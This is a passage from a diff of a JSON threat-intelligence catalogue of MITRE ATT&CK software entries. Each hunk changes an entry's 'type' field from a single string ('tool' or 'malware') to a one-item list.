"malware" + ] }, "related": [ { @@ -23884,7 +25172,9 @@ "8bf128ad-288b-41bc-904f-093f4fdde745", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23961,7 +25251,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -23983,7 +25275,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24028,7 +25322,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24047,7 +25343,9 @@ ], "software_attack_id": "S0019", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24088,7 +25386,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24129,7 +25429,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24170,7 +25472,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24211,7 +25515,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24273,7 +25579,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24300,7 +25608,9 @@ ], "software_attack_id": "S0375", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24345,7 +25655,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24364,7 +25676,9 @@ ], "software_attack_id": "S0166", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24387,7 +25701,9 @@ ], "software_attack_id": "S0592", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24438,7 +25754,9 @@ ], "software_attack_id": "S0125", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24491,7 +25809,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24515,7 +25835,9 @@ "e551ae97-d1b4-484e-9267-89f33829ec2c", "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24542,7 +25864,9 @@ ], "software_attack_id": "S0379", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24611,7 +25935,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24653,7 +25979,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24676,7 +26004,9 @@ ], "software_attack_id": "S0433", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24699,7 +26029,9 @@ ], "software_attack_id": "S0003", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24722,7 +26054,9 @@ ], "software_attack_id": "S0448", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24741,7 +26075,9 @@ "tags": [ "c9c73000-30a5-4a16-8c8b-79169f9c24aa" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24769,7 +26105,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24788,7 +26126,9 @@ ], "software_attack_id": "S0112", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24811,7 +26151,9 @@ ], "software_attack_id": "S0270", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24837,7 +26179,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24860,7 +26204,9 @@ ], "software_attack_id": "S1078", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24880,7 +26226,9 @@ "meta": { "software_attack_id": "S0103", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -24907,7 +26255,9 @@ ], "software_attack_id": "S0090", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24931,7 +26281,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -24979,7 +26331,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25002,7 +26356,9 @@ "tags": [ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25035,7 +26391,9 @@ ], "software_attack_id": "S0148", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25065,7 +26423,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25093,7 +26453,9 @@ ], "software_attack_id": "S0358", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25138,7 +26500,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25255,7 +26619,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25274,7 +26640,9 @@ ], "software_attack_id": "S0253", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25315,7 +26683,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25355,7 +26725,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25382,7 +26754,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25416,7 +26790,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25470,7 +26846,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25519,7 +26897,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25542,7 +26922,9 @@ ], "software_attack_id": "S1085", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25586,7 +26968,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25626,7 +27010,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25710,7 +27096,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25750,7 +27138,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25772,7 +27162,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25798,7 +27190,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25864,7 +27258,9 @@ "tags": [ "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25895,7 +27291,9 @@ ], "software_attack_id": "S0345", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25921,7 +27319,9 @@ "tags": [ "311abf64-a9cc-4c6a-b778-32c5df5658be" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -25955,7 +27355,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -25999,7 +27401,9 @@ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26033,7 +27437,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26060,7 +27466,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26101,7 +27509,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26142,7 +27552,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26183,7 +27595,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26219,7 +27633,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26279,7 +27695,9 @@ "tags": [ "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26305,7 +27723,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26332,7 +27752,9 @@ "tags": [ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26351,7 +27773,9 @@ ], "software_attack_id": "S1089", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26379,7 +27803,9 @@ "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96", "dcd6d78a-50e9-4fbd-a36a-06fbe6b7b40c" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26404,7 +27830,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26423,7 +27851,9 @@ ], "software_attack_id": "S0546", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26449,7 +27879,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26494,7 +27926,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26535,7 +27969,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26575,7 +28011,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26594,7 +28032,9 @@ ], "software_attack_id": "S0444", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26617,7 +28057,9 @@ ], "software_attack_id": "S0445", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26637,7 +28079,9 @@ "meta": { "software_attack_id": "S0028", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26688,7 +28132,9 @@ ], "software_attack_id": "S0063", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26716,7 +28162,9 @@ "meta": { "software_attack_id": "S0217", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26742,7 +28190,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26768,7 +28218,9 @@ "tags": [ "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26791,7 +28243,9 @@ ], "software_attack_id": "S0692", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26814,7 +28268,9 @@ "tags": [ "4fa6f8e1-b0d5-4169-8038-33e355c08bde" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26833,7 +28289,9 @@ ], "software_attack_id": "S0007", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26852,7 +28310,9 @@ ], "software_attack_id": "S0468", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26876,7 +28336,9 @@ "tags": [ "e81ba503-60b0-4b64-8f20-ef93e7783796" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -26927,7 +28389,9 @@ ], "software_attack_id": "S0533", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26954,7 +28418,9 @@ ], "software_attack_id": "S0218", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -26994,7 +28460,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27024,7 +28492,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27060,7 +28530,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27083,7 +28555,9 @@ ], "software_attack_id": "S1086", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27106,7 +28580,9 @@ ], "software_attack_id": "S0159", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27129,7 +28605,9 @@ ], "software_attack_id": "S0273", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27193,7 +28671,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27240,7 +28720,9 @@ "15b77e5c-2285-434d-9719-73c14beba8bd", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27270,7 +28752,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27292,7 +28776,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27315,7 +28801,9 @@ ], "software_attack_id": "S0157", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27338,7 +28826,9 @@ ], "software_attack_id": "S0035", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27364,7 +28854,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27388,7 +28880,9 @@ ], "software_attack_id": "S0374", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27412,7 +28906,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27434,7 +28930,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27487,7 +28985,9 @@ "15b77e5c-2285-434d-9719-73c14beba8bd", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27526,7 +29026,9 @@ "cd1b5d44-226e-4405-8985-800492cf2865", "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27571,7 +29073,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27587,7 +29091,9 @@ "meta": { "software_attack_id": "S0225", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27632,7 +29138,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27651,7 +29159,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27696,7 +29206,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27736,7 +29248,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27758,7 +29272,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27801,7 +29317,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27820,7 +29338,9 @@ ], "software_attack_id": "S0058", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27843,7 +29363,9 @@ ], "software_attack_id": "S0188", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27883,7 +29405,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27927,7 +29451,9 @@ "tags": [ "2e621fc5-dea4-4cb9-987e-305845986cd3" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -27976,7 +29502,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -27995,7 +29523,9 @@ ], "software_attack_id": "S0142", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28021,7 +29551,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28044,7 +29576,9 @@ ], "software_attack_id": "S0491", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28084,7 +29618,9 @@ "tags": [ "a98d7a43-f227-478e-81de-e7299639a355" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28107,7 +29643,9 @@ ], "software_attack_id": "S0085", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28126,7 +29664,9 @@ ], "software_attack_id": "S1042", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28145,7 +29685,9 @@ ], "software_attack_id": "S1049", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28181,7 +29723,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28212,7 +29756,9 @@ "f2ae2283-f94d-4f8f-bbde-43f2bed66c55", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28235,7 +29781,9 @@ ], "software_attack_id": "S0578", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28257,7 +29805,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28276,7 +29826,9 @@ ], "software_attack_id": "S0018", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28299,7 +29851,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28340,7 +29894,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -28381,7 +29937,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -28403,7 +29961,9 @@ "tags": [ "b20e7912-6a8d-46e3-8e13-9a3fc4813852" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28422,7 +29982,9 @@ ], "software_attack_id": "S0060", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28448,7 +30010,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28489,7 +30053,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -28545,7 +30111,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28590,7 +30158,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -28696,7 +30266,9 @@ ], "software_attack_id": "S0663", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28731,7 +30303,9 @@ ], "software_attack_id": "S0098", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28756,7 +30330,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -28775,7 +30351,9 @@ ], "software_attack_id": "S0011", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28800,7 +30378,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -28819,7 +30399,9 @@ ], "software_attack_id": "S0586", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28842,7 +30424,9 @@ ], "software_attack_id": "S0467", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28882,7 +30466,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -28901,7 +30487,9 @@ ], "software_attack_id": "S1011", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -28930,7 +30518,9 @@ "cd1b5d44-226e-4405-8985-800492cf2865", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29004,7 +30594,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [], "uuid": "7a5d457c-949c-4e8f-817a-7e2d33f6c618", @@ -29029,7 +30621,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29048,7 +30642,9 @@ ], "software_attack_id": "S0164", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29092,7 +30688,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29132,7 +30730,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29164,7 +30764,9 @@ "15b77e5c-2285-434d-9719-73c14beba8bd", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29222,7 +30824,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29251,7 +30855,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "8bf128ad-288b-41bc-904f-093f4fdde745" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [], "uuid": "b9a98499-c984-4199-ae64-d1381ebbaa1f", @@ -29286,7 +30892,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29322,7 +30930,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29382,7 +30992,9 @@ "7e7b0c67-bb85-4996-a289-da0e792d7172", "2e621fc5-dea4-4cb9-987e-305845986cd3" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29409,7 +31021,9 @@ ], "software_attack_id": "S0665", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29443,7 +31057,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29470,7 +31086,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "e727eaa6-ef41-4965-b93a-8ad0c51d0236" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29504,7 +31122,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29527,7 +31147,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29550,7 +31172,9 @@ ], "software_attack_id": "S0004", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29573,7 +31197,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ 